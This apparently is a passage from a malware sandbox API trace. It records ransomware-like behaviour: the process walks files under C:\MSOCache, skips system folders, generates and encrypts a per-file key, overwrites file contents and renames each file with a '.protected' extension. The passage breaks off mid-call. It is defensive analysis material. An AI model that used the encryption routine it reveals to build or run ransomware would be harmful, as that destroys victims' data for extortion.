[0058.956] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.957] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0058.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".rar") returned 0x0 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".zip") returned 0x0 [0058.957] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.968] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.968] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.969] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.969] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) 
returned 1 [0058.974] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.974] CloseHandle (hObject=0xb4) returned 1 [0058.974] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.protected") returned 85 [0058.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.protected")) returned 1 [0058.975] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Windows") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Program Files") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Program Files (x86)") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="$Recycle.bin") returned 1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="System Volume Information") returned -1 [0058.975] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".protected") returned 0x0 [0058.975] lstrcmpW (lpString1="dwdcw20.dll", lpString2="RESTORE_FILES.txt") returned -1 [0058.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.975] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.975] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".txt") returned 0x0 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".rar") returned 0x0 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".zip") returned 0x0 [0058.975] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.977] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.977] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.977] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.977] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.978] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.978] CloseHandle (hObject=0xb4) returned 1 [0058.979] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.protected") returned 88 [0058.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.protected")) returned 1 [0058.979] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Windows") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Program Files") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Program Files (x86)") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="$Recycle.bin") returned 1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="System Volume Information") returned -1 [0058.979] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.979] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".protected") returned 0x0 [0058.979] lstrcmpW (lpString1="dwtrig20.exe", 
lpString2="RESTORE_FILES.txt") returned -1 [0058.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".txt") returned 0x0 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".rar") returned 0x0 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".zip") returned 0x0 [0058.980] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.984] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.984] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.985] 
SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.985] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.994] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.994] CloseHandle (hObject=0xb4) returned 1 [0058.995] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.protected") returned 89 [0058.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.protected")) returned 1 [0058.995] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Windows") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Program Files") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Program Files (x86)") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="$Recycle.bin") returned 1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="System Volume Information") returned -1 [0058.995] wnsprintfW (in: pszDest=0x47c9d8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.995] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".protected") returned 0x0 [0058.995] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0058.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.996] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.996] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".txt") returned 0x0 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".rar") returned 0x0 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".zip") returned 0x0 [0058.997] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x741, 
lpOverlapped=0x0) returned 1 [0059.004] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x741, lpOverlapped=0x0) returned 1 [0059.004] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.005] CloseHandle (hObject=0xb4) returned 1 [0059.005] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.protected") returned 104 [0059.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.protected")) returned 1 [0059.005] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", 
lpString2="Windows") returned -1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Program Files") returned -1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Program Files (x86)") returned -1 [0059.006] lstrcmpiW (lpString1="msvcr90.dll", lpString2="$Recycle.bin") returned 1 [0059.006] lstrcmpiW (lpString1="msvcr90.dll", lpString2="System Volume Information") returned -1 [0059.006] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".protected") returned 0x0 [0059.006] lstrcmpW (lpString1="msvcr90.dll", lpString2="RESTORE_FILES.txt") returned -1 [0059.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.006] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.006] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW (lpFirst="msvcr90.dll", lpSrch=".txt") returned 0x0 [0059.006] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW (lpFirst="msvcr90.dll", lpSrch=".rar") returned 0x0 [0059.006] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW 
(lpFirst="msvcr90.dll", lpSrch=".zip") returned 0x0 [0059.006] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.401] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.401] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.402] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.402] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.403] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.403] CloseHandle (hObject=0xb4) returned 1 [0059.403] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.protected") returned 88 [0059.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.protected")) returned 1 
[0059.404] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Windows") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Program Files") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Program Files (x86)") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="$Recycle.bin") returned 1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="System Volume Information") returned -1 [0059.404] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.404] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".protected") returned 0x0 [0059.404] lstrcmpW (lpString1="OfficeLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0059.404] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.405] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".txt") returned 0x0 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW 
(lpFirst="OfficeLR.cab", lpSrch=".rar") returned 0x0 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".zip") returned 0x0 [0059.405] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.408] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.408] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.420] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.420] CloseHandle (hObject=0xb4) returned 1 [0059.425] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.protected") returned 89 [0059.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), 
